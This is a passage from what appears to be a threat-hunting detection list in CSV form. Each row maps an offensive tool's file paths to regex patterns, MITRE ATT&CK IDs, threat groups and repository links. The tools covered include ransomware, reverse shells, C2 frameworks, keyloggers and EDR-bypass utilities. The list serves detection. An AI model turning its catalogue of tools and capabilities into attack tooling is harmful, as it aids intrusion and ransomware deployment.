"*/hidden-tear.git*",".{0,1000}\/hidden\-tear\.git.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7768" 
"*/HiddenTear.zip*",".{0,1000}\/HiddenTear\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7769" "*/hidden-tear/write.php?info=*",".{0,1000}\/hidden\-tear\/write\.php\?info\=.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7770" "*/hidden-tear-remake.git*",".{0,1000}\/hidden\-tear\-remake\.git.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7771" "*/hijack_opener/*.js*",".{0,1000}\/hijack_opener\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","7772" "*/hijack_opener/*.rb*",".{0,1000}\/hijack_opener\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","7773" "*/HijackDLL-CreateRemoteThread.cpp*",".{0,1000}\/HijackDLL\-CreateRemoteThread\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","7774" "*/HijackDll-Process.cpp*",".{0,1000}\/HijackDll\-Process\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","7775" "*/HijackDLL-Threads.*",".{0,1000}\/HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","7776" "*/HijackHunter/*",".{0,1000}\/HijackHunter\/.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","7777" "*/HInvoke.cs*",".{0,1000}\/HInvoke\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","7778" "*/hiphp.git*",".{0,1000}\/hiphp\.git.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7779" "*/hiphp-cli.sh*",".{0,1000}\/hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7780" "*/hiphp-desktop.sh*",".{0,1000}\/hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7781" "*/hiphp-main*",".{0,1000}\/hiphp\-main.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","7782" "*/HiveDump.ps1*",".{0,1000}\/HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7783" "*/HiveDump.ps1*",".{0,1000}\s\/HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#windows","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","7784" "*/hnap-info.nse*",".{0,1000}\/hnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7785" "*/hoaxshell.git*",".{0,1000}\/hoaxshell\.git.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","7786" "*/hoaxshell/*.py*",".{0,1000}\/hoaxshell\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","7787" "*/holehe.git*",".{0,1000}\/holehe\.git.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","7788" "*/hollow.x64.*",".{0,1000}\/hollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","1","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","7789" "*/home/app/wstunnel*",".{0,1000}\/home\/app\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data 
Exfiltration","https://github.com/erebe/wstunnel","1","0","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","7791" "*/home/daddyShark/BabySh4rk/*",".{0,1000}\/home\/daddyShark\/BabySh4rk\/.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#linux","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","7793" "*/home/kali*",".{0,1000}home\/kali\/Downloads.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7794" "*/home/lowpriv/*",".{0,1000}\/home\/lowpriv\/.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","7795" "*/home/pyrdp/*",".{0,1000}\/home\/pyrdp\/.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","7796" "*/home/sliver/*",".{0,1000}\/home\/sliver\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform 
adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","7797" "*/home/tarcisio/teste*",".{0,1000}\/home\/tarcisio\/teste.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","7799" "*/home/tor2web/*",".{0,1000}\/home\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","7800" "*/hookchain_finder64.exe*",".{0,1000}\/hookchain_finder64\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","1","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","7802" "*/HookChain_msg.exe*",".{0,1000}\/HookChain_msg\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/helviojunior/hookchain","1","1","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","7803" "*/HookDetector.exe*",".{0,1000}\/HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","7804" "*/hooks/spoof.c*",".{0,1000}\/hooks\/spoof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","7805" "*/HookSentry.exe*",".{0,1000}\/HookSentry\.exe.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","0","1","N/A","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","7806" "*/HookSentry.git*",".{0,1000}\/HookSentry\.git.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","1","N/A","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","7807" "*/hop.php*",".{0,1000}\/hop\.php.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7808" "*/horizon3ai/*",".{0,1000}\/horizon3ai\/.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation 
tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","7809" "*/HostEnum.ps1*",".{0,1000}\/HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7811" "*/hostenum.py*",".{0,1000}\/hostenum\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","7812" "*/hostmap-bfk.nse*",".{0,1000}\/hostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7813" "*/hostmap-crtsh.nse*",".{0,1000}\/hostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7814" "*/hostmap-robtex.nse*",".{0,1000}\/hostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7815" "*/HostRecon.ps1*",".{0,1000}\/HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","7816" "*/Hotkeyz.exe*",".{0,1000}\/Hotkeyz\.exe.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","1","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","7817" "*/hotkeyz.git*",".{0,1000}\/hotkeyz\.git.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","1","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","7818" "*/HouQing/*/Loader.go",".{0,1000}\/HouQing\/.{0,1000}\/Loader\.go","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","7819" "*/HRShell.git*",".{0,1000}\/HRShell\.git.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - 